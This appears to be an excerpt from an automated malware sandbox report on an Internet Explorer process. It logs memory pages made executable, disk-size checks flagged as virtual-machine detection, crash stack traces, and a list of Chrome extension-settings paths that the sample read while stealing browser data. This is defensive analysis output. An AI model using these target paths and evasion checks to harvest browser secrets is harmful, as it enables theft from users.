NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73cc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73cb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ca1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ed1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71c21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6e5f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75201000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76971000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74fc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75061000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d421000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d391000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x69df1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fad1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:50 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x719c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 5, 2024, 7:50 a.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71011000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (7 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Jan. 5, 2024, 7:49 a.m.	number_of_free_clusters: 2425228 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 5, 2024, 7:49 a.m.	number_of_free_clusters: 2425228 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 5, 2024, 7:49 a.m.	number_of_free_clusters: 2424618 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 5, 2024, 7:49 a.m.	number_of_free_clusters: 2424618 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW Jan. 5, 2024, 7:51 a.m.	total_number_of_free_bytes: 9852542976 free_bytes_available: 9852542976 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 5, 2024, 7:51 a.m.	total_number_of_free_bytes: 9852542976 free_bytes_available: 9852542976 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW Jan. 5, 2024, 7:51 a.m.	total_number_of_free_bytes: 9876254720 free_bytes_available: 9876254720 root_path: C: total_number_of_bytes: 34252779520	1	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2140 crashed
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 100659256 registers.edi: 73414940 registers.eax: 100659256 registers.ebp: 100659336 registers.edx: 578 registers.ebx: 100659620 registers.esi: 2147746133 registers.ecx: 73322400	1	0	0
__exception__ Jan. 5, 2024, 7:50 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x72c5540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x72c552ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72d30ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 59104456 registers.edi: 1974991376 registers.eax: 59104456 registers.ebp: 59104536 registers.edx: 1 registers.ebx: 5944084 registers.esi: 2147746133 registers.ecx: 53142274	1	0	0

Application Crash

Process iexplore.exe with pid 2140 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Jan. 5, 2024, 7:50 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 100659256
registers.edi: 73414940
registers.eax: 100659256
registers.ebp: 100659336
registers.edx: 578
registers.ebx: 100659620
registers.esi: 2147746133
registers.ecx: 73322400

__exception__

Jan. 5, 2024, 7:50 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x72c5540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x72c552ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72d30ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 59104456
registers.edi: 1974991376
registers.eax: 59104456
registers.ebp: 59104536
registers.edx: 1
registers.ebx: 5944084
registers.esi: 2147746133
registers.ecx: 53142274

Steals private information from local Internet browsers (50 out of 4173 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlSoceng.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
